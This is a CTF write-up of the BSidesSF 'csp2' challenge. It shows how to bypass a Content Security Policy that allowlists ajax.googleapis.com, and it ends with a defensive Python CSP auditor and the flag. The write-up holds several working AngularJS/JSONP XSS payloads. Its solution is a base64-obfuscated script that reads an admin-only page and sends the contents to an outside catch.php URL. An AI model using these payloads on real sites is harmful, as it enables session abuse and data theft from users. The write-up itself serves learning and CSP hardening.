csp2 [web]

csp2

Round two: Can you bypass the CSP? Try to read /csp-two-flag as admin, all payloads submitted here will be sent to the admin.

https://csp-2-2446d5a3.challenges.bsidessf.net/

Recon

CSP header:

content-security-policy: script-src 'self' ajax.googleapis.com 'unsafe-eval'; default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report

It seems we can load scripts from ajax.googleapis.com (script-src also allows 'unsafe-eval', and connect-src * lets XHR reach any origin); let's see what we can do with that.

Working XSS 1:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script><div ng-app ng-csp id=p ng-click=$event.view.alert(1337)><script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

Source: https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22

Working XSS 2:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script>
<div ng-app ng-csp><base href=//ajax.googleapis.com/ajax/libs/><script src=angularjs/1.0.1/angular.js></script><script src=prototype/1.7.2.0/prototype.js></script>{{$on.curry.call().alert(1337)}}

Working XSS 3:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script>
<div ng-app ng-csp id=p ng-click="x=$event.view.window;x.alert(1)">
<script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

Working XSS 4:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script>
<div ng-app ng-csp id=p ng-click='x=$event.view.window;x.alert("AAA");y=x.atob("YWxlcnQoIkFOVVMiKQ==");x.eval(y)'>
<script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

Solution:

<script src="//ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js"></script>
<div ng-app ng-csp id=p ng-click='x=$event.view.window;y=x.atob("dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOwp4aHIub3BlbignR0VUJywgJ2h0dHBzOi8vY3NwLTItMjQ0NmQ1YTMuY2hhbGxlbmdlcy5ic2lkZXNzZi5uZXQvY3NwLXR3by1mbGFnJywgdHJ1ZSk7Cnhoci5zZXRSZXF1ZXN0SGVhZGVyKCdDb250ZW50LXR5cGUnLCAnYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkJyk7Cnhoci5vbmxvYWQgPSBmdW5jdGlvbiAoKSB7CnZhciByZXF1ZXN0ID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7CnJlcXVlc3Qub3BlbignR0VUJywgJ2h0dHBzOi8vaGF3a2plLm5ldC9jYXRjaC5waHA/Yz0nK3hoci5yZXNwb25zZVRleHQsIHRydWUpOwpyZXF1ZXN0LnNlbmQoKQp9Owp4aHIuc2VuZCgpOw==");x.eval(y)'>
<script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

The base64 blob decoded is:

var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://csp-2-2446d5a3.challenges.bsidessf.net/csp-two-flag', true);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.onload = function () {
var request = new XMLHttpRequest();
request.open('GET', 'https://xxx.net/catch.php?c='+xhr.responseText, true);
request.send()
};
xhr.send();
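From a defender's side the recon header is the whole story: script-src allowlists ajax.googleapis.com together with 'unsafe-eval', base-uri is unset (which the <base href> trick in XSS 2 relies on), and connect-src * gives the exfiltration channel. The following is an added example, not part of this writeup, that parses a CSP header and flags those four weaknesses against a hardened policy; the hardened header and the gadget-host list are assumptions, and the weak header is the challenge's own.

```python
# Constructed samples: the challenge's header as posted, and a hardened policy (assumed).
WEAK_CSP = ("script-src 'self' ajax.googleapis.com 'unsafe-eval'; "
            "default-src 'self' 'unsafe-inline'; connect-src *; report-uri /csp_report")
HARDENED_CSP = ("script-src 'nonce-R4nd0mV4lu3' 'strict-dynamic'; default-src 'self'; "
                "base-uri 'none'; object-src 'none'; connect-src 'self'; report-uri /csp_report")

# Hosts that serve JSONP endpoints or AngularJS builds; allowlisting one of them in
# script-src hands an attacker script that runs under the policy (assumed, not exhaustive).
GADGET_HOSTS = {"ajax.googleapis.com", "www.google.com", "cdnjs.cloudflare.com"}


def parse_csp(header):
    """Split a CSP header into {directive: [source expressions]}."""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def host_of(source):
    """Reduce a host-source expression ('https://cdn.x.com:443/libs/') to its host."""
    if source.startswith("'") or source in ("*", "data:", "blob:"):
        return None  # keyword, wildcard or scheme source, not a host
    return source.split("://")[-1].split("/")[0].split(":")[0].lower()


def audit_csp(header):
    """Return the list of weaknesses found, in a fixed order; empty means none."""
    d = parse_csp(header)
    findings = []
    script = d.get("script-src", d.get("default-src", []))
    if "'unsafe-eval'" in script:
        findings.append("unsafe-eval: strings passed to eval/Function run as script")
    for src in script:
        host = host_of(src)
        if host is None:
            continue
        # A wildcard like '*.googleapis.com' covers every gadget host under that suffix.
        suffix = host[1:] if host.startswith("*.") else None
        for g in sorted(GADGET_HOSTS):
            if g == host or (suffix and g.endswith(suffix)):
                findings.append(f"gadget host: {g} allowlisted in script-src (JSONP/AngularJS)")
    if "base-uri" not in d:
        findings.append("no base-uri: <base href> can retarget relative script URLs")
    connect = d.get("connect-src", d.get("default-src", []))
    if "*" in connect:
        findings.append("connect-src *: XHR/fetch may reach any origin (exfiltration channel)")
    return findings
```

Run it over the challenge header and it reports all four findings; the nonce plus 'strict-dynamic' policy reports none, because host allowlists are ignored and only nonced scripts (and what they load) execute.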

Flag

CTF{Canned_Spam_Perfection}